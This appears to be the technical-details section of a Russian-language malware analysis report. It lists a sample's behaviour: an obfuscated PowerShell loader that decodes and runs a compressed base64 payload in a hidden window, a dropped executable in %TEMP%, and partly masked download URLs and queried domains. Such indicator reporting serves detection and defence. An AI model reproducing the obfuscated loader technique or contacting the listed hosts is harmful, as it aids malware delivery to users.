Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( ([STrIng]$VErBosepREFERenCe)[1,3]+'X'-joiN'')( NeW-oBJECt io.ComPresSION.defLATEstrEAm([SYsTEm.io.MEmorYstREAm][sySTem.CONVert]::FROmBase64StrINg('VZBBTwIxFIT/yh6aFIK03FSaTVARowc1wQQPXrrtg3...
- %TEMP%\978.exe
- %TEMP%\978.exe
- 'jd###vice.ru':80
- '19#.#4.233.66':80
- 'si####oimoveis.com':80
- http://www.jd###vice.ru/A/
- http://19#.#4.233.66/?Ur###########################################
- http://si####oimoveis.com/TyWFgcu/
- DNS ASK jd###vice.ru
- DNS ASK el######.stkippersada.ac.id
- DNS ASK ma#####napiotrowska.pl
- DNS ASK si####oimoveis.com
- DNS ASK do####hientrieu.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( ([STrIng]$VErBosepREFERenCe)[1,3]+'X'-joiN'')( NeW-oBJECt io.ComPresSION.defLATEstrEAm([SYsTEm.io.MEmorYstREAm][sySTem.CONVert]::FROmBase64StrINg('VZBBTwIxFIT/yh6aFIK03FSaTVARowc1wQQPXrrtg3...' (со скрытым окном)